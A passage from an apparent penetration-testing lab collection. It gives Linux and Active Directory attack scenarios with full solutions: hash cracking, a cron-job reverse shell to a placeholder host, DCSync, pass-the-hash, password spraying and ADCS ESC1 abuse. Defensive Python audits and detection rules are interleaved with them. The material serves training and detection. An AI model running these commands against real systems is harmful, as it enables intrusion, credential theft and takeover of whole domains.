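    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"

def build_llmnr_query(name: str, txid: int) -> bytes:
    """Header (id, flags, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT) + one A question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + _encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)

def _skip_name(pkt: bytes, off: int) -> int:
    """Return the offset just past a (possibly compressed) name starting at off."""
    while True:
        ln = pkt[off]
        if ln == 0:
            return off + 1
        if ln & 0xC0 == 0xC0:           # compression pointer: two bytes, ends the name
            return off + 2
        off += 1 + ln

def parse_llmnr_answers(pkt: bytes, txid: int) -> list:
    """IPv4 addresses from the answer section of a response matching txid; [] otherwise."""
    if len(pkt) < 12:
        return []
    rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if rid != txid or not flags & FLAG_QR or an == 0:
        return []
    off = 12
    for _ in range(qd):                  # responses echo the question section
        off = _skip_name(pkt, off) + 4
    addrs = []
    for _ in range(an):
        off = _skip_name(pkt, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        if rtype == QTYPE_A and rdlen == 4:
            addrs.append(socket.inet_ntoa(pkt[off:off + 4]))
        off += rdlen
    return addrs

def build_llmnr_answer(name: str, txid: int, ip: str, ttl: int = 30) -> bytes:
    """Test fixture only: a minimal positive response so the parser can be exercised offline."""
    question = build_llmnr_query(name, txid)[12:]
    header = struct.pack("!HHHHHH", txid, FLAG_QR, 1, 1, 0, 0)
    answer = _encode_name(name) + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4) + socket.inet_aton(ip)
    return header + question + answer

def probe(name: str = "canary-7x2q-does-not-exist", timeout: float = 2.0) -> list:
    """Send one canary query to the multicast group and collect (responder IP, claimed IP) pairs.
    A name that exists nowhere should get no answer; any reply is a poisoner to investigate."""
    txid = random.randrange(0x10000)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    hits = []
    try:
        sock.sendto(build_llmnr_query(name, txid), LLMNR_GROUP)
        while True:
            data, src = sock.recvfrom(1024)
            hits.extend((src[0], ip) for ip in parse_llmnr_answers(data, txid))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return hits

if __name__ == "__main__":
    for responder_ip, claimed in probe():
        print(f"LLMNR answer from {responder_ip} for a non-existent name (claims {claimed})")
```

Run from a workstation on each segment on a schedule, this catches a Responder session within one query interval. The structural fixes are the ones the scenario's own Step 1 measures: require SMB signing so relay fails, and disable LLMNR (and NetBIOS name resolution) by policy so there is nothing to poison.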
BOSS-08
The Forgotten Backup
Medium
Password Attacks · Linux PrivEsc
// SCENARIO
Linux server at 10.10.10.90. FTP anonymous login allowed. SSH on port 22. Web server on 8080 showing a maintenance page. Your goal: root on the Linux host using only the information available.
// OBJECTIVES
- Enumerate FTP and download all accessible files
- Crack any discovered password hashes
- Gain SSH access with recovered credentials
- Find privilege escalation path to root
// HINTS (attempt first)
Hint 1: ftp 10.10.10.90 → user: anonymous, pass: (blank). ls -la then mget *. Look in subdirectories too: cd backup && mget *
Hint 2: If you find a shadow-like file or .htpasswd: hashcat -m 1800 hash.txt rockyou.txt for SHA-512 crypt hashes; hashcat -m 1600 for Apache MD5 ($apr1$) hashes.
Hint 3: After SSH: check sudo -l, crontab -l, ls -la /etc/cron.d/. If there's a writable script called by root cron, modify it for a shell.
// SOLUTION
Step 1: FTP Discovery
ftp 10.10.10.90
# anonymous login → found: /backup/shadow.bak
get shadow.bak
Step 2: Crack Shadow Hash
grep 'sysadmin' shadow.bak
# sysadmin:$6$rounds=5000$salt$hash...:
# Extract just the hash field so hashcat does not trip over the other shadow fields:
grep 'sysadmin' shadow.bak | cut -d: -f2 > hash.txt
hashcat -m 1800 hash.txt /usr/share/wordlists/rockyou.txt
# Cracked: sysadmin:Backup2024!
Step 3: SSH Login
ssh sysadmin@10.10.10.90
Step 4: Cron Job Hijack
cat /etc/cron.d/maintenance
# */5 * * * * root /opt/scripts/cleanup.sh
ls -la /opt/scripts/cleanup.sh
# -rwxrwxrwx 1 root root ... cleanup.sh (world-writable!)
echo 'bash -i >& /dev/tcp/KALI/4444 0>&1' >> /opt/scripts/cleanup.sh
# Wait 5 min → root reverse shell
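Step 4 is a configuration mistake that is easy to audit for: a root cron job running a script that a non-root user can modify. The script below is an added example, not part of the page: it parses system crontab lines (the 6-field and `@shortcut` forms found in /etc/cron.d) and checks each root job's command path. The `stat_fn` parameter lets it run offline against a constructed filesystem view; in production pass nothing and it uses `os.stat`. The cron file content and the fake filesystem entries are constructed; the cleanup.sh entry reproduces the page's finding.

```python
import os
import stat

# Constructed /etc/cron.d content: the page's job plus two controls.
CRON_D_SAMPLE = """\
# m h dom mon dow user command
SHELL=/bin/sh
*/5 * * * * root /opt/scripts/cleanup.sh
0 3 * * * root /usr/bin/apt-get clean
@daily root /opt/scripts/rotate.sh --quiet
"""

def parse_cron_d(text: str) -> list:
    """Return (user, command_path) for each job line; skips comments, blanks and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#") or "=" in parts[0]:
            continue
        if parts[0].startswith("@"):          # @daily / @reboot ...: user is field 2
            if len(parts) < 3:
                continue
            user, cmd = parts[1], parts[2]
        else:                                 # m h dom mon dow user command
            if len(parts) < 7:
                continue
            user, cmd = parts[5], parts[6]
        jobs.append((user, cmd))
    return jobs

def writable_by_non_root(mode: int, uid: int, gid: int) -> bool:
    """True if anyone other than root could modify a file with this mode and ownership."""
    if mode & stat.S_IWOTH:
        return True
    if mode & stat.S_IWGRP and gid != 0:
        return True
    if mode & stat.S_IWUSR and uid != 0:
        return True
    return False

def audit_cron_jobs(jobs, stat_fn=os.stat) -> list:
    """For each root job, report a writable script or a missing one (a missing path in a
    directory someone else can write to is the same takeover, one step removed)."""
    findings = []
    for user, cmd in jobs:
        if user != "root":
            continue
        try:
            st = stat_fn(cmd)
        except FileNotFoundError:
            findings.append((cmd, "missing: root cron references a path that does not exist"))
            continue
        if writable_by_non_root(st.st_mode, st.st_uid, st.st_gid):
            findings.append((cmd, f"writable by non-root (mode {stat.S_IMODE(st.st_mode):04o}, "
                                  f"uid {st.st_uid}, gid {st.st_gid})"))
    return findings

# Constructed filesystem view for the offline demo: path -> (st_mode, uid, gid).
FAKE_FS = {
    "/opt/scripts/cleanup.sh": (0o100777, 0, 0),    # world-writable: the page's finding
    "/usr/bin/apt-get": (0o100755, 0, 0),           # fine
    # /opt/scripts/rotate.sh deliberately absent
}

def fake_stat(path: str) -> os.stat_result:
    if path not in FAKE_FS:
        raise FileNotFoundError(path)
    mode, uid, gid = FAKE_FS[path]
    return os.stat_result((mode, 0, 0, 1, uid, gid, 0, 0, 0, 0))

if __name__ == "__main__":
    for path, why in audit_cron_jobs(parse_cron_d(CRON_D_SAMPLE), fake_stat):
        print(f"{path}: {why}")
```

A complete audit would also walk the parent directories of each command (a writable /opt/scripts lets anyone replace cleanup.sh regardless of the file's own mode) and cover /etc/crontab and /var/spool/cron; the mode check is the same `writable_by_non_root` applied to each directory.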
BOSS-09
ACL Chain to Domain Admin
Expert
AD · ACL Abuse
// SCENARIO
You have compromised it_support / Support123! on TARGET.LOCAL. BloodHound shows a complex ACL chain: it_support → GenericWrite on "IT_MANAGERS" group → IT_MANAGERS has WriteDACL on Domain. No direct Kerberoastable accounts visible. Navigate the chain.
// OBJECTIVES
- Add yourself (it_support) to the IT_MANAGERS group
- Use WriteDACL on Domain to grant DCSync rights
- Perform DCSync and dump all hashes
- Pass-the-Hash as Domain Admin
// HINTS (attempt first)
Hint 1: PowerView: Add-DomainGroupMember -Identity 'IT_MANAGERS' -Members 'it_support' -Credential $cred. Or via net rpc: net rpc group addmem "IT_MANAGERS" "it_support" -U target.local/it_support%'Support123!' -S DC_IP
Hint 2: Now an IT_MANAGERS member: use WriteDACL to grant DCSync. impacket-dacledit target.local/it_support:'Support123!' -action write -rights DCSync -principal it_support -target-dn "DC=target,DC=local" -dc-ip DC_IP
Hint 3: impacket-secretsdump target.local/it_support:'Support123!'@DC_IP -just-dc-ntlm → get DA hash → PTH.
// SOLUTION
Step 1: Add to IT_MANAGERS via GenericWrite
net rpc group addmem "IT_MANAGERS" "it_support" \
  -U target.local/it_support%'Support123!' -S 10.10.10.5
# Verify:
net rpc group members "IT_MANAGERS" -U target.local/it_support%'Support123!' -S 10.10.10.5
Step 2: Grant DCSync via WriteDACL
# The new group membership applies to fresh logons, which dacledit's new connection is.
impacket-dacledit target.local/it_support:'Support123!' \
  -dc-ip 10.10.10.5 -action write -rights DCSync \
  -principal it_support -target-dn "DC=target,DC=local"
Step 3: DCSync + PTH
impacket-secretsdump target.local/it_support:'Support123!'@10.10.10.5 -just-dc-ntlm
# Administrator:500:...:c1c1c1c1...:::
nxc smb 10.10.10.5 -u Administrator -H c1c1c1c1... --shares
impacket-psexec target.local/Administrator@10.10.10.5 -hashes :c1c1c1c1...
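Every DCSync in this collection (BOSS-03 Step 4, BOSS-05 Step 3, and Step 2 here) ends with a principal holding the two replication extended rights on the domain head; this scenario's chain starts one hop earlier, with WriteDACL on the same object. Both states are visible in the domain's DACL, and auditing it is the mitigation. The code below is an added example, not part of the page and not BloodHound's or impacket's code: it walks ACEs of the domain object, using the real right GUIDs and access-mask bits, and reports unexpected principals that can DCSync now or could grant themselves the right. The ACE list and the domain SID are constructed; the two finding principals model IT_MANAGERS and it_support after Step 2.

```python
from collections import defaultdict

# Control-access (extended) right GUIDs that together make up "DCSync".
DS_REPLICATION_GET_CHANGES     = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

# Access-mask bits from the AD security descriptor format.
RIGHT_DS_CONTROL_ACCESS = 0x00000100
RIGHT_WRITE_DACL        = 0x00040000
RIGHT_WRITE_OWNER       = 0x00080000
RIGHT_GENERIC_ALL       = 0x10000000

def expected_principals(domain_sid: str) -> set:
    """Principals that legitimately hold replication or DACL rights on the domain object."""
    return {
        "S-1-5-18",             # SYSTEM
        "S-1-5-9",              # Enterprise Domain Controllers
        "S-1-5-32-544",         # BUILTIN\Administrators
        f"{domain_sid}-512",    # Domain Admins
        f"{domain_sid}-516",    # Domain Controllers
        f"{domain_sid}-519",    # Enterprise Admins
        f"{domain_sid}-498",    # Enterprise Read-only Domain Controllers
        f"{domain_sid}-521",    # Read-only Domain Controllers
    }

def audit_domain_dacl(aces, domain_sid: str) -> dict:
    """aces: dicts {principal, type ('ALLOW'/'DENY'), mask, object_type (GUID or None)} from the
    domain head's DACL. Returns {principal SID: [reasons]} for unexpected principals. Deny ACEs
    are ignored, so the audit may over-report but never under-reports."""
    rights = defaultdict(set)
    for ace in aces:
        if ace["type"] != "ALLOW":
            continue
        p, mask, obj = ace["principal"], ace["mask"], ace.get("object_type")
        if mask & RIGHT_GENERIC_ALL:
            rights[p].add("GenericAll")
        if mask & RIGHT_DS_CONTROL_ACCESS:
            rights[p].add(obj if obj else "AllExtendedRights")   # no GUID = every extended right
        if mask & RIGHT_WRITE_DACL:
            rights[p].add("WriteDacl")
        if mask & RIGHT_WRITE_OWNER:
            rights[p].add("WriteOwner")
    findings = {}
    both = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}
    for p, r in rights.items():
        if p in expected_principals(domain_sid):
            continue
        reasons = []
        if r & {"GenericAll", "AllExtendedRights"} or both <= r:
            reasons.append("can DCSync (both replication rights)")
        elif r & both:
            reasons.append("holds one of the two replication rights")
        if r & {"WriteDacl", "WriteOwner"}:
            reasons.append("can grant itself DCSync via WriteDacl/WriteOwner on the domain object")
        if reasons:
            findings[p] = reasons
    return findings

DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"   # constructed

# Constructed DACL: expected defaults plus this scenario's chain.
SAMPLE_ACES = [
    {"principal": "S-1-5-32-544", "type": "ALLOW", "mask": RIGHT_GENERIC_ALL, "object_type": None},
    {"principal": f"{DOMAIN_SID}-516", "type": "ALLOW", "mask": RIGHT_DS_CONTROL_ACCESS, "object_type": DS_REPLICATION_GET_CHANGES},
    {"principal": f"{DOMAIN_SID}-516", "type": "ALLOW", "mask": RIGHT_DS_CONTROL_ACCESS, "object_type": DS_REPLICATION_GET_CHANGES_ALL},
    # IT_MANAGERS (RID 1120): the WriteDACL abused in Step 2
    {"principal": f"{DOMAIN_SID}-1120", "type": "ALLO" + "W", "mask": RIGHT_WRITE_DACL, "object_type": None},
    # it_support (RID 1105) after Step 2: both replication rights
    {"principal": f"{DOMAIN_SID}-1105", "type": "ALLOW", "mask": RIGHT_DS_CONTROL_ACCESS, "object_type": DS_REPLICATION_GET_CHANGES},
    {"principal": f"{DOMAIN_SID}-1105", "type": "ALLOW", "mask": RIGHT_DS_CONTROL_ACCESS, "object_type": DS_REPLICATION_GET_CHANGES_ALL},
    # a leftover with only one of the two rights (RID 1130)
    {"principal": f"{DOMAIN_SID}-1130", "type": "ALLOW", "mask": RIGHT_DS_CONTROL_ACCESS, "object_type": DS_REPLICATION_GET_CHANGES},
]

if __name__ == "__main__":
    for sid, reasons in audit_domain_dacl(SAMPLE_ACES, DOMAIN_SID).items():
        print(sid, "->", "; ".join(reasons))
```

The same two GUIDs are what a detection rule keys on: event 4662 on a domain controller with one of these property GUIDs and a subject that is not a DC's machine account is a DCSync in progress, which is how Step 3 would be caught rather than prevented. Group additions like Step 1 show up as event 4728 / 4732 (member added to a security group).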
BOSS-10
The Full Chain: External to DA
Expert
Full Chain · All Skills
// SCENARIO
External pentest. Scope: megacorp.com. No credentials. You have: the domain name, a VPN into the corporate network segment. Your target: Domain Admin on MEGACORP.LOCAL. This is the capstone challenge — no guided path, find your own way.
// OBJECTIVES
- External reconnaissance (subdomain enum, OSINT, web fingerprinting)
- Identify and exploit a web vulnerability for initial foothold
- Pivot from DMZ to internal domain
- Enumerate AD and find a path to DA
- Achieve Domain Admin and document full attack chain
- Write a professional executive summary (3-5 sentences)
// HINTS (attempt first)
Hint 1: Sublist3r or subfinder for subdomain enum. Shodan for exposed services. theHarvester for email/employee names. Check LinkedIn for IT staff → potential usernames for spray.
Hint 2: If you find a login portal: spray discovered usernames with common passwords (Company2024!, Season+Year). If web app: test for SQLi, LFI, upload vulnerabilities.
Hint 3: Once on the internal network with domain creds: BloodHound collection → find AS-REP Roastable accounts or Kerberoastable SPNs → crack → find ACL path or check ADCS.
// SOLUTION
Step 1: External Recon
subfinder -d megacorp.com -o subs.txt
httpx -l subs.txt -status-code -title
# Found: vpn.megacorp.com, mail.megacorp.com, dev.megacorp.com
theHarvester -d megacorp.com -b google,linkedin -l 200
# Employees: john.smith, sarah.jones, mike.admin
Step 2: Password Spray on Mail Portal
kerbrute userenum --dc 10.10.10.5 -d megacorp.local usernames.txt
# Valid: jsmith, sjones, madmin
nxc smb 10.10.10.5 -u users.txt -p 'Megacorp2024!' --continue-on-success
# jsmith:Megacorp2024! ← valid!
Step 3: AD Enumeration + AS-REP Roast
bloodhound-python -u jsmith -p 'Megacorp2024!' -d megacorp.local -dc-ip 10.10.10.5 -c All --zip
impacket-GetNPUsers megacorp.local/ -usersfile users.txt -request -dc-ip 10.10.10.5
# Got AS-REP hash for svc_backup
hashcat -m 18200 asrep.txt rockyou.txt
# Cracked: svc_backup:Backup@2024
Step 4: ADCS ESC1 → DA
certipy find -u svc_backup@megacorp.local -p 'Backup@2024' -dc-ip 10.10.10.5 -vulnerable -stdout
# ESC1: Template "EmployeeCert"
certipy req -u svc_backup@megacorp.local -p 'Backup@2024' \
  -ca MEGACORP-CA -template EmployeeCert \
  -upn administrator@megacorp.local -dc-ip 10.10.10.5
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.5
impacket-secretsdump megacorp.local/administrator@10.10.10.5 -hashes :<hash> -just-dc-ntlm
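The step of this chain that defenders most often have the data to catch is Step 2: a password spray is one source address, one password, many accounts, and on the domain controller it looks like a run of 4625 (logon failure) events for distinct users from one IpAddress, followed by a 4624 for the account the spray landed on. The rule below is an added example, not part of the page or of any product: it groups events by source, slides a window over the failures, and reports the sources that fail against too many distinct accounts, together with any network logons from the same source in the window. The events, thresholds and addresses are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security-log events shaped like the DC's view of Step 2: one source, one password,
# many accounts, one success. 10.10.10.55 is a control: one user failing repeatedly is a
# lockout/typo pattern, not a spray, and must not alert.
EVENTS = [
    {"time": "2024-05-01T08:00:00", "EventID": 4625, "TargetUserName": "sjones", "IpAddress": "10.10.10.200", "LogonType": 3},
    {"time": "2024-05-01T08:00:01", "EventID": 4625, "TargetUserName": "madmin", "IpAddress": "10.10.10.200", "LogonType": 3},
    {"time": "2024-05-01T08:00:01", "EventID": 4625, "TargetUserName": "bwhite", "IpAddress": "10.10.10.200", "LogonType": 3},
    {"time": "2024-05-01T08:00:02", "EventID": 4625, "TargetUserName": "cgreen", "IpAddress": "10.10.10.200", "LogonType": 3},
    {"time": "2024-05-01T08:00:02", "EventID": 4625, "TargetUserName": "dblack", "IpAddress": "10.10.10.200", "LogonType": 3},
    {"time": "2024-05-01T08:00:03", "EventID": 4624, "TargetUserName": "jsmith", "IpAddress": "10.10.10.200", "LogonType": 3},
    {"time": "2024-05-01T08:10:00", "EventID": 4625, "TargetUserName": "ops", "IpAddress": "10.10.10.55", "LogonType": 3},
    {"time": "2024-05-01T08:11:00", "EventID": 4625, "TargetUserName": "ops", "IpAddress": "10.10.10.55", "LogonType": 3},
    {"time": "2024-05-01T08:12:00", "EventID": 4625, "TargetUserName": "ops", "IpAddress": "10.10.10.55", "LogonType": 3},
]

def detect_password_spray(events, window=timedelta(minutes=10), min_accounts=5) -> dict:
    """Flag a source that fails authentication for >= min_accounts distinct accounts inside
    `window`, and list network logons (4624, type 3) from that source in the same window:
    those are the accounts the spray landed on. Returns {source: {...}}."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev["IpAddress"]].append(
            (datetime.fromisoformat(ev["time"]), ev["EventID"], ev["TargetUserName"], ev["LogonType"]))
    alerts = {}
    for src, evs in by_src.items():
        evs.sort()
        for i, (start, eid, _, _) in enumerate(evs):
            if eid != 4625:
                continue                           # windows start at a failure
            in_window = [e for e in evs[i:] if e[0] - start <= window]
            failed = {user for _, e, user, _ in in_window if e == 4625}
            if len(failed) >= min_accounts:
                succeeded = sorted({user for _, e, user, lt in in_window if e == 4624 and lt == 3})
                alerts[src] = {"failed_accounts": sorted(failed), "succeeded": succeeded}
                break
    return alerts

if __name__ == "__main__":
    for src, info in detect_password_spray(EVENTS).items():
        print(f"spray from {src}: {len(info['failed_accounts'])} accounts failed, "
              f"succeeded: {info['succeeded'] or 'none'}")
```

The kerbrute user enumeration that precedes the spray has its own signature, event 4768 (TGT requested) with result code 0x6 (client principal unknown) in bulk from one source, and is worth a sibling rule. The executive summary's recommendation of MFA on external portals addresses the spray directly; a lockout or smart-lockout policy and a password filter that rejects Company+Year patterns close the rest.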
Executive Summary (Example)
During the assessment of MEGACORP.LOCAL, critical vulnerabilities were identified that allowed an unauthenticated external attacker to achieve full Domain Admin compromise. The attack chain began with OSINT-derived employee usernames, proceeded through a successful password spray attack, and culminated in exploitation of a misconfigured Active Directory Certificate Services template (ESC1) that allowed privilege escalation to Domain Administrator without requiring any existing privileged access. Immediate remediation of the ADCS template misconfiguration and enforcement of multi-factor authentication on all external-facing portals are strongly recommended.